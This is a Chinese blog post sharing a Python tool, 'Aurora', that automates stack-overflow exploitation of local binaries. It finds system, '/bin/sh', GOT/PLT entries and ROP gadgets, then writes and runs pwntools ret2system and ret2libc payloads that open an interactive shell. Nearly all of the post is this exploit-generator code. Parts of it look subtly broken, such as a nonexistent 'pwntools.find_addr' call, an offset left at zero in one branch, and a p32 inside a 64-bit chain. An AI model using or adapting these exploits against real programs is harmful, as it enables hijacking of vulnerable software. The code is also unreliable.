Aurora简单二进制漏洞利用工具

最新推荐文章于 2024-06-25 09:46:33 发布
最新推荐文章于 2024-06-25 09:46:33 发布
阅读量139 收藏
点赞数 2
文章标签: python 安全 c语言 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/j_______________/article/details/138309483
版权

文章目录

概要

Python对二进制文件漏洞payload的处理

整体架构流程

在这里插入图片描述

che.py

import subprocess
import os
import pwntools
class Checker():
    #return program bit
    def bitter(file):
        comm = 'checksec '+str(file)
        bit = 0
        data = subprocess.getstatusoutput(comm)
        if('i386' in str(data)):
            bit = 32
        elif('amd64' in str(data)):
            bit = 64
        else:
            bit = 0
        return bit
    #return program protect level
    def protect(file):
        comm = 'checksec '+str(file)
        data = subprocess.getstatusoutput(comm)
        level = 0
        if('Canary found' in str(data)):
            level += 1
        if('NX enabled' in str(data)):
            level += 2
        if('PIE enabled' in str(data)):
            level += 4
        return level
    #retern print level string
    def read_protect(val):
        if(val == 0 ):
            protect = '=-=-   NO Protect!    -=-='
        elif(val == 1 ):
            protect = '=-| '+'Canary in Stack !'+' |-=\n'
        elif(val == 5 ):
            protect = '=-| '+'Canary in Stack !'+' |-=\n'+'=-|   '+'PIE enabled !'+'   |-=\n'
        elif(val == 2 ):
            protect = '=-|    '+'NX enable !'+'    |-=\n'
        elif(val == 4 ):
            protect = '=-|   '+'PIE enabled !'+'   |-=\n'
        elif(val == 3 ):
            protect = '=-| '+'Canary in Stack !'+' |-=\n=-|    '+'NX enable !'+'    |-=\n'
        elif(val == 7 ):
            protect = '=-| '+'Canary in Stack !'+' |-=\n=-|    '+'NX enable !'+'    |-=\n=-|   '+'PIE enabled !'+'   |-=\n'
        else:
            protect = '==---  Unknow: '+str(val)+'   ---==\n'
        return '=-=-=-=-=-=-=-=-=-=-=-=-=\n=-       Protect       -=\n=-=-=-=-=-=-=-=-=-=-=-=-=\n' + protect +'=-=-=-=-=-=-=-=-=-=-=-=-=\n'
    #return libc addr
    def libc_addr(file):
        comm = 'ldd '+str(file)
        dat = subprocess.getstatusoutput(comm)
        dat = str(dat).split('=>')[1]
        dat = dat.split(' ')[1]
        return dat
    #64bit gadget info 
    def gadget(file):
        comm = 'ROPgadget --binary '+str(file)+' --only "pop|ret"'
        dat = os.system(comm)
        comm = 'ROPgadget --binary '+str(file)+' --string "/bin/sh"'
        dat = os.system(comm)
        comm = 'objdump -d -M intel '+str(file)+' | grep "system" '
        dat = os.system(comm)
        comm = 'objdump -d -M intel '+str(file)+' | grep "main" '
        dat = os.system(comm)
        comm = 'objdump -d -M intel '+str(file)+' | grep "read" '
        dat = os.system(comm)
        comm = 'objdump -d -M intel '+str(file)+' | grep "puts" '
        dat = os.system(comm)
        comm = 'objdump -d -M intel '+str(file)+' | grep "write" '
        dat = os.system(comm)
    #write in payload.py
    def wri_payload(bitter):
        f = open("payload.py",'a')
        f.close()
    #search '/bin/sh' & system addr
    def eazy_get(file):
        fun_na = 'system'
        comm = 'objdump -d -M intel '+str(file)+' | grep '+ fun_na
        re =  subprocess.getstatusoutput(comm)
        sys_addr = ''
        if(len(re[1]) < 10 ):
            print('\033[1;31m No find function: system in '+file+'\033[0m')
        else:
            sys_addr = pwntools.find_addr(file,'system','fun')
            print('\033[1;32m System address : \033[0m'+str(hex(sys_addr)))

        fun_na = '"/bin/sh"'
        comm = 'ROPgadget --binary '+str(file)+' --string '+ fun_na
        re =  subprocess.getstatusoutput(comm)
        bin_sh_addr = ''
        num = 0
        base = 0
        if(len(re[1]) < 100 ):
            print('\033[1;31m No find "/bin/sh" in '+file+'\033[0m')
        else:
            bin_sh_addr = pwntools.find_addr(file,'','/bin/sh')
            print('\033[1;32m "/bin/sh" address : \033[0m'+str(hex(bin_sh_addr)))
        if(sys_addr != '' and bin_sh_addr != '' ):
            Checker.wri_payload(32)
            f = open("payload.py",'a')
            f.write('\np = process("./' + file + '")')
            f.write('\nsystem_addr = ' + str(sys_addr) + '')
            f.write('\nbin_sh_addr = ' + str(bin_sh_addr))

            num = int(input('How many inputs did the overflow occur(1-5)?\n: '))
            if( num > 1):
                for i in range(num-1):
                    base = input('How many buf arrive EBP?(0x??)\n: ')
                    f.write('\np.sendline(b"A")')
                    f.write('\nsleep(0.3)')
            else:
                if(input('Are you need Auto find base?(y/n)') == 'y'):
                    comm = 'objdump -d -M intel ' + file + ' | grep -B 10 "<read@plt>" |grep ebp-'
                    dat = subprocess.getstatusoutput(comm)
                    comm2 = 'objdump -d -M intel ' + file + ' | grep -B 10 "<gets@plt>" |grep ebp-'
                    dat2 = subprocess.getstatusoutput(comm2)
                    if(dat[1] == ''):
                        dat = dat2
                    dat = str(dat).split('ebp-')[1][:4]
                    base = dat.replace(']', '0')
                else:
                    base = input('How many buf arrive EBP?(0x??)\n: ')
            f.write('\npayload = b"A" * ' + str(base) + ' + p32(0) + p32('+str(sys_addr)+') + p32(0) + p32(' + str(bin_sh_addr) + ')')
            f.write('\np.sendline(payload)')
            f.write('\nsleep(0.3)')
            f.write('\np.sendline(b"ls /")')
            f.write('\np.interactive()')
            f.close()
            os.system("python3 payload.py")
        if(sys_addr == '' or bin_sh_addr == '' ):
            fun_na = 'puts'
            comm = 'objdump -d -M intel '+str(file)+' | grep '+ fun_na
            re =  subprocess.getstatusoutput(comm)
            if(len(re[1]) < 10 ):
                print('\033[1;31m No find function: puts in '+file+'\033[0m')
            else:
                num = 0
                stack_base = 0
                puts_addr  = pwntools.find_addr(file,'puts','func')
                Checker.wri_payload(32)
                f = open("payload.py",'a')
                f.write('\np = process("./' + file + '")')
                f.write('\nelf = ELF("' + file + '")')
                f.write('\nlibc = ELF("' + Checker.libc_addr(file) + '")')
                f.write('\nlibc_sys_addr = libc.symbols["system"]')
                f.write('\nlibc_bin_sh_addr = next(libc.search(b"/bin/sh"))')
                f.write('\nlibc_puts_addr = libc.symbols["puts"]')
                f.write('\nputs_got = elf.got["puts"]')
                f.write('\nputs_plt = elf.plt["puts"]')
                f.write('\nmain_addr = elf.symbols["main"]')
                num = int(input('How many inputs did the overflow occur(1-5)?\n: '))
                if( num > 1):
                    for i in range(num-1):
                        base = input('How many buf arrive EBP?(0x??)\n: ')
                        f.write('\np.sendline(b"A")')
                        f.write('\nsleep(0.3)')
                else:
                    if(input('Are you need Auto find base?(y/n)') == 'y'):
                        comm = 'objdump -d -M intel ' + file + ' | grep -B 10 "<read@plt>" |grep ebp-'
                        dat = subprocess.getstatusoutput(comm)
                        comm2 = 'objdump -d -M intel ' + file + ' | grep -B 10 "<gets@plt>" |grep ebp-'
                        dat2 = subprocess.getstatusoutput(comm2)
                        if(dat[1] == ''):
                            dat = dat2
                        dat = str(dat).split('ebp-')[1][:4]
                        base = dat.replace(']', '0')
                    else:
                        base = input('How many buf arrive EBP?(0x??)\n: ')
                f.write('\npayload = b"A" * ' + str(stack_base) + ' + p32(0) + p32(puts_plt) + p32(main_addr) + p32(puts_got)')
                f.write('\np.sendline(payload)')
                f.write('\nputs_addr = u32(p.recvuntil("\\xf7")[-4:])')
                f.write('\nbase_addr = puts_addr - libc_puts_addr')
                if( num > 1):
                    for i in range(num-1):
                        f.write('\np.sendline(b"A")')
                        f.write('\nsleep(0.3)')
                f.write('\npayload = b"A" * ' + str(stack_base) + ' + p32(0) + p32(libc_sys_addr + base_addr) + p32(0) + p32(libc_bin_sh_addr+base_addr)')
                f.write('\nsleep(0.3)')
                f.write('\np.sendline(payload)')
                f.write('\np.sendline(b"ls /")')
                f.write('\np.interactive()')
                f.close()
                os.system("python3 payload.py")
    def eazy_pie(file):
        fun_na = 'puts'
        comm = 'objdump -d -M intel '+str(file)+' | grep '+ fun_na
        re =  subprocess.getstatusoutput(comm)
        if(len(re[1]) < 10 ):
            num = 0
            stack_base = 0
            write_addr  = pwntools.find_addr(file,'write','func')
            Checker.wri_payload(32)
            f = open("payload.py",'a')
            f.write('\np = process("./' + file + '")')
            f.write('\nelf = ELF("' + file + '")')
            f.write('\nlibc = ELF("' + Checker.libc_addr(file) + '")')
            f.write('\nlibc_sys_addr = libc.symbols["system"]')
            f.write('\nlibc_bin_sh_addr = next(libc.search(b"/bin/sh"))')
            f.write('\nlibc_write_addr = libc.symbols["write"]')
            f.write('\nwrite_got = elf.got["write"]')
            f.write('\nwrite_plt = elf.plt["write"]')
            f.write('\nmain_addr = elf.symbols["main"]')
            num = int(input('How many inputs did the overflow occur(1-5)?\n: '))
            if( num > 1):
                for i in range(num-1):
                    base = input('How many buf arrive EBP?(0x??)\n: ')
                    f.write('\np.sendline(b"A")')
                    f.write('\nsleep(0.3)')
            else:
                comm = 'objdump -d -M intel ' + file + ' | grep -B 10 "<read@plt>" |grep ebp-'
                dat = subprocess.getstatusoutput(comm)
                comm2 = 'objdump -d -M intel ' + file + ' | grep -B 10 "<gets@plt>" |grep ebp-'
                dat2 = subprocess.getstatusoutput(comm2)
                if(dat[1] == ''):
                    dat = dat2
                dat = str(dat).split('ebp-')[1][:4]
                stack_base = dat.replace(']', '0')
            f.write('\npayload = b"A" * ' + str(stack_base) + ' + p32(0) + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) +p32(4)')
            f.write('\np.sendline(payload)')
            f.write('\nwrite_addr = u32(p.recvuntil("\\xf7")[-4:])')
            f.write('\nbase_addr = write_addr - libc_write_addr') 
            if( num > 1):
                for i in range(num-1):
                    f.write('\np.sendline(b"A")')
                    f.write('\nsleep(0.3)')
            f.write('\npayload = b"A" * ' + str(stack_base) + ' + p32(0) + p32(libc_sys_addr + base_addr) + p32(0) + p32(libc_bin_sh_addr+base_addr)')
            f.write('\nsleep(0.3)')
            f.write('\np.sendline(payload)')
            f.write('\np.sendline(b"ls /")')
            f.write('\np.interactive()')
            f.close()
            os.system("python3 payload.py")
        else:
            num = 0
            stack_base = 0
            puts_addr  = pwntools.find_addr(file,'puts','func')
            Checker.wri_payload(32)
            f = open("payload.py",'a')
            f.write('\np = process("./' + file + '")')
            f.write('\nelf = ELF("' + file + '")')
            f.write('\nlibc = ELF("' + Checker.libc_addr(file) + '")')
            f.write('\nlibc_sys_addr = libc.symbols["system"]')
            f.write('\nlibc_bin_sh_addr = next(libc.search(b"/bin/sh"))')
            f.write('\nlibc_puts_addr = libc.symbols["puts"]')
            f.write('\nputs_got = elf.got["puts"]')
            f.write('\nputs_plt = elf.plt["puts"]')
            f.write('\nmain_addr = elf.symbols["main"]')
            num = int(input('How many inputs did the overflow occur(1-5)?\n: '))
            if( num > 1):
                for i in range(num-1):
                    base = input('How many buf arrive EBP?(0x??)\n: ')
                    f.write('\np.sendline(b"A")')
                    f.write('\nsleep(0.3)')
            else:
                comm = 'objdump -d -M intel ' + file + ' | grep -B 10 "<read@plt>" |grep ebp-'
                dat = subprocess.getstatusoutput(comm)
                comm2 = 'objdump -d -M intel ' + file + ' | grep -B 10 "<gets@plt>" |grep ebp-'
                dat2 = subprocess.getstatusoutput(comm2)
                if(dat[1] == ''):
                    dat = dat2
                dat = str(dat).split('ebp-')[1][:4]
                stack_base = dat.replace(']', '0')
            f.write('\npayload = b"A" * ' + str(stack_base) + ' + p32(0) + p32(puts_plt) + p32(main_addr) + p32(puts_got)')
            f.write('\np.sendline(payload)')
            f.write('\nputs_addr = u32(p.recvuntil("\\xf7")[-4:])')
            f.write('\nbase_addr = puts_addr - libc_puts_addr')
            if( num > 1):
                for i in range(num-1):
                    f.write('\np.sendline(b"A")')
                    f.write('\nsleep(0.3)')
            f.write('\npayload = b"A" * ' + str(stack_base) + ' + p32(0) + p32(libc_sys_addr + base_addr) + p32(0) + p32(libc_bin_sh_addr+base_addr)')
            f.write('\nsleep(0.3)')
            f.write('\np.sendline(payload)')
            f.write('\np.sendline(b"ls /")')
            f.write('\np.interactive()')
            f.close()
            os.system("python3 payload.py")

    #64 bit!
    def eazy_get_64(file):
        fun_na = 'system'
        comm = 'objdump -d -M intel ' + file + ' | grep '+ fun_na
        re =  subprocess.getstatusoutput(comm)
        sys_addr = ''
        if(len(re[1]) < 10 ):
            print('\033[1;31m No find function: system in '+file+'\033[0m')
        else:
            sys_addr = pwntools.find_addr(file,'system','fun')
            print('\033[1;32m System address : \033[0m'+str(hex(sys_addr)))

        fun_na = '"/bin/sh"'
        comm = 'ROPgadget --binary '+str(file)+' --string '+ fun_na
        re =  subprocess.getstatusoutput(comm)
        bin_sh_addr = ''
        if(len(re[1]) < 100 ):
            print('\033[1;31m No find "/bin/sh" in '+file+'\033[0m')
        else:
            bin_sh_addr = pwntools.find_addr(file,'','/bin/sh')
            print('\033[1;32m "/bin/sh" address : \033[0m'+str(hex(bin_sh_addr)))

        fun_na = '"pop|ret"'
        fun2 = '"rdi"'
        comm = 'ROPgadget --binary '+str(file)+' --only '+ fun_na +' | grep ' + fun2
        re =  subprocess.getstatusoutput(comm)
        pop_rdi_ret_addr = ''
        if(len(re[1]) < 14 ):
            print('\033[1;31m No find Gadget: POP,RET - RDI in '+file+'\033[0m')
        else:
            re = str(re)
            pop_rdi_ret_addr = int(re.split(" ")[1].replace("'", ''),16)
            print('\033[1;32m "POP,RET - RDI" address : \033[0m'+str(hex(pop_rdi_ret_addr)))
        
            fun_na = '"ret"'
            comm = 'ROPgadget --binary ' + file + ' --only '+ fun_na +' | grep ' + fun_na
            re =  subprocess.getstatusoutput(comm)
            ret_addr = ''
            if(len(re[1]) < 14 ):
                print('\033[1;31m No find Gadget: RET in '+file+'\033[0m')
            else:
                re = str(re)
                ret_addr = int(re.split(" ")[1].replace("'", ''),16)
                print('\033[1;32m "RDI" address : \033[0m'+str(hex(ret_addr)))
        num = 0
        base = 0

        if(sys_addr != '' and bin_sh_addr != '' and pop_rdi_ret_addr != '' and ret_addr != ''):
            Checker.wri_payload(32)
            f = open("payload.py",'a')
            f.write('\np = process("./' + file + '")')
            f.write('\nsystem_addr = ' + str(sys_addr))
            f.write('\nbin_sh_addr = ' + str(bin_sh_addr))
            f.write('\npop_rdi_ret_addr = ' + str(pop_rdi_ret_addr))
            f.write('\nret_addr = ' + str(ret_addr))

            num = int(input('How many inputs did the overflow occur(1-5)?\n: '))
            if( num > 1):
                for i in range(num-1):
                    base = input('How many buf arrive RBP?(0x??)\n: ')
                    f.write('\np.sendline(b"A")')
                    f.write('\nsleep(0.3)')
            else:
                if(input('Are you need Auto find base?(y/n)') == 'y'):
                    comm = 'objdump -d -M intel ' + file + ' | grep -B 10 "<read@plt>" |grep rbp-'
                    dat = subprocess.getstatusoutput(comm)
                    comm2 = 'objdump -d -M intel ' + file + ' | grep -B 10 "<gets@plt>" |grep rbp-'
                    dat2 = subprocess.getstatusoutput(comm2)
                    if(dat[1] == ''):
                        dat = dat2
                    dat = str(dat).split('rbp-')[1][:4]
                    base = dat.replace(']', '0')
                else:
                    base = input('How many buf arrive EBP?(0x??)\n: ')

            f.write('\npayload = b"A" * ' + str(base) + ' + p64(0) + p32(ret_addr) + p64(pop_rdi_ret_addr) + p64(bin_sh_addr) + p64(system_addr)')
            f.write('\np.sendline(payload)')
            f.write('\nsleep(0.3)')
            f.write('\np.sendline(b"ls /")')
            f.write('\np.interactive()')
            f.close()
            os.system("python3 payload.py")
jjjjjones
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
浅析ES6的八进制与二进制整数字面量
09-01
在ES6(ECMAScript 2015)中,为了增强JavaScript的表达能力和适应更多场景,引入了八进制和二进制整数字面量的表示方式,这对于处理特定领域的问题,如文件权限设置、计算机系统编程等,非常有用。 在旧版本的...
二进制漏洞利用原理--栈溢出
网络安全研究
12-28 766
函数的局部变量在栈中一个挨着一个排列。如果这些局部变量中有数组之类的缓冲区,并且程序中存在数组越界的缺陷,那么越界的数组元素就有可能破坏栈中相邻变量的值,甚至破坏栈帧中所保存的EBP值、返回地址等重要数据。
二进制漏洞分析与挖掘
05-16 5529
本公众号分享的所有技术仅用于学习交流,请勿用于其他非法活动,如果错漏,欢迎留言指正 二进制漏洞分析与挖掘 《0day安全:软件漏洞分析技术第2版》王清电子工业出版社 入门用,但不全,过时了,linux部分没有包含进去 漏洞分析、挖掘和利用,安全领域重要和最具挑战性和对抗性的分支 应用在综合开发,算法,语法,系统底层,内核,逆向,汇编,调试等方方面面 漏洞是怎么回事? BUG:软件的功能性逻辑缺陷。影响软件的正常功能。 漏洞:能够导致软件做一些超出设计范围的事情的bug,则漏洞。这类BU..
掌握二进制漏洞利用的利器:Moneyshot
gitblog_00022的博客
06-25 314
掌握二进制漏洞利用的利器:Moneyshot 项目地址:https://gitcode.com/blasty/moneyshot 项目介绍 Moneyshot是一个Python脚本集合,专为二进制漏洞利用的最后阶段和缓冲区构造提供便利。这个项目虽非高深的科技,但它包含了大家在某个时刻可能都编写过的实用小工具简单易用,却又功能强大。 项目技术分析 Moneyshot依赖于Python(目前仅支持2...
二进制漏洞挖掘_windows漏洞利用如何快速入门
weixin_39808803的博客
12-04 883
windows二进制安全研究,漏洞利用是提现一个人段位的名片。windows二进制漏洞入门包含了。https://www.kanxue.com/book-42.htm1.简单栈溢出利用2.gs保护绕过利用。包含:攻击seh绕过gs;攻击虚函数表绕过gs3.aslr保护绕过利用。包含:部分覆盖绕过aslr;heap spy 绕过aslr。4.dep保护绕过。rop绕过dep。5.safeseh保护绕...
二进制漏洞与利用学习
q664609859的博客
07-24 4384
二进制漏洞与利用学习 一、主要术语 Binary:由编译类语言生成的可执行程序 Vulnerability:Binary中包含的可被利用的Bug Exploit:借助Vulnerability来劫持Binary控制流的、经过特殊构造的数据 0day:可被exploit的位置Vulnerability Pwn:发现Vulnerability以及开发exploit的工作 二、目的: 获取shell
漏洞分析——二进制漏洞
sxr__nc的博客
01-10 4952
二进制漏洞:传统的缓冲区溢出、UAF(Use-After-Free)等涉及二进制编码的漏洞统称为二进制漏洞 根据缓冲区所处的不同内存空间以及分配方式的不同,缓冲区溢出可以分为栈溢出和堆溢出 栈溢出原理: 栈是一种基本的数据结构,是由编译器自动进行分配、释放的。栈遵循先进后出的规则,生长方向为从高向低生长,也就是地址由高到低 栈中存放的数据:对于要调用的子函数来说,存放子函数的参数、返回地址、局部变...
Aurora勒索病毒专用解密工具
04-07
这种病毒通常通过网络钓鱼、恶意附件或者漏洞利用等方式传播。一旦感染,它会使用强大的加密算法对用户的文件进行加密,使得用户无法正常访问这些文件。Aurora勒索病毒的名称来源于古北欧神话中的“极光”,它可能被...
免费数字签名软件为二进制文件进行签名
04-22
在IT领域,数字签名是一种重要的安全技术,用于验证软件或二进制文件的来源和完整性。免费数字签名软件使得开发者和用户能够确保他们处理的文件未被篡改,并且来自可信的源头。以下是对这个主题的详细解释: 一、...
Aurora Android测试安装包
09-01
Apks downloaded form Aurora - com.colanotes.android.282 - com.google.android.gms.204714039.config.en - net.sourceforge.opencamera.80
aurora-engine/aurora
最新发布
08-30
aurora-engine/auroraaurora-engine/auroraaurora-engine/auroraaurora-engine/auroraaurora-engine/auroraaurora-engine/auroraaurora-engine/auroraaurora-engine/auroraaurora-engine/auroraaurora-engine/...
二进制漏洞挖掘技术实战
热门推荐
stonesharp的专栏
03-24 1万+
0×00前言 0X01漏洞挖掘方法 0X02手动法漏洞挖掘 0X03通用FUZZ法进行漏洞挖掘: 0X04智能FUZZ法进行漏洞挖掘: 0X05总结 正文 0X00 前言: 关于二进制漏洞研究,大体可以分为漏洞分析利用和漏洞挖掘两部分。关于漏洞分析利用的部分互联网可以搜索到大量文章,而漏洞挖掘的文章却寥寥无几。因此我在这里主要来讲一下如何对
二进制菜鸟之栈溢出漏洞利用思路
Blood_Pupil的博客
08-06 952
作为一只二进制菜鸟,不,应该是作为一只各安全领域的菜鸟,感觉二进制学的还是蛮开心的,每天也都能学到点新的东西,调试代码的过程也是非常令人开心。今天总结下目前学到的栈溢出漏洞的利用思路 栈溢出漏洞简介 我们知道C语言中有些字符串操作函数不会对字符串的长度进行检查,比如strcpy。 #include<stdio.h> #include<string.h> char nam...
二进制漏洞挖掘之ret2text栈溢出
brucexia的专栏
01-31 683
(2)执行“gcc -m32 -fno-stack-protector ret2text.c -o ret2text”命令,编译程序,再使用gdb调试程序,使程序运行到read函数,执行“cyclic 200”命令,生成200个字符。执行“python ret2text.py”命令,运行脚本,获取系统shell,再执行“ls”命令,测试shell能否正常使用,结果如图11-32所示。由图可知,ebp地址存储的字符为“eaaa”,执行“cyclic -l eaaa”,结果如图11-30所示。
❤️超详细PWN新手入门教程❤️《二进制各种漏洞原理实战分析总结》
Test网络安全
09-15 1万+
本部分将对常见的二进制漏洞做系统分析,方便在漏洞挖掘过程中定位识别是什么类型漏洞,工欲善其事,必先利其器。 0x01栈溢出漏洞原理 栈溢出漏洞属于缓冲区漏洞的一种,实例如下: #include <stdio.h> #include <string.h> int main() { char *str = "AAAAAAAAAAAAAAAAAAAAAAAA"; vulnfun(str); return; } int vulnfun(char *st
CTF竞赛二进制类题型解析(逆向工程、二进制漏洞利用、缓冲区溢出)
白帽子凯哥聊黑客
12-13 2465
描述:一个程序使用了自定义通信协议。分析并理解协议细节。答案:捕获和分析网络流量,逆向工程协议。
二进制各种漏洞原理实战分析总结
hhd1988的专栏
10-27 3351
二进制各种漏洞原理实战分析总结 0x01栈溢出漏洞原理 0x02 堆溢出漏洞原理 0x03 堆调试技巧 堆尾检查 页堆 0x04整数溢出漏洞原理 基于栈的整数溢出 ...
漏洞挖掘的艺术-面向二进制的静态漏洞挖掘
Yale的博客
09-18 2082
0x00 本文是本系列的第二篇,将对面向二进制程序的静态漏洞挖掘技术进行介绍与分析。 面向二进制程序的静态漏洞的挖掘技术由于缺少源代码中的结构化信息,面临着值集分析(vaule-set analysis,VSA)与控制流恢复不精确的问题,但是二进制程序相对于源码而言更容易获得,所以这方面的研究工作一直都有新的研究动态,并且会在0x02部分介绍目前流程的两种技术。在进一步分析之前,我们首先来具体解释前文提出的两个问题。 0x01 1.1 值集分析是一种结合数值分析和指针分析的静态分析算法。VSA是一种基于抽象
网络攻击技术解析:漏洞利用与防范
"漏洞利用程序-计算机前沿技术--网络常见攻击技术分析"是一门针对网络安全的专业课程,由黄斌主讲,来自莆田学院信息技术研究所和电子信息工程学系。课程深入探讨了当前网络环境中的重要安全问题。首先,课程旨在...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

jjjjjones

笑死,根本没人打赏

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值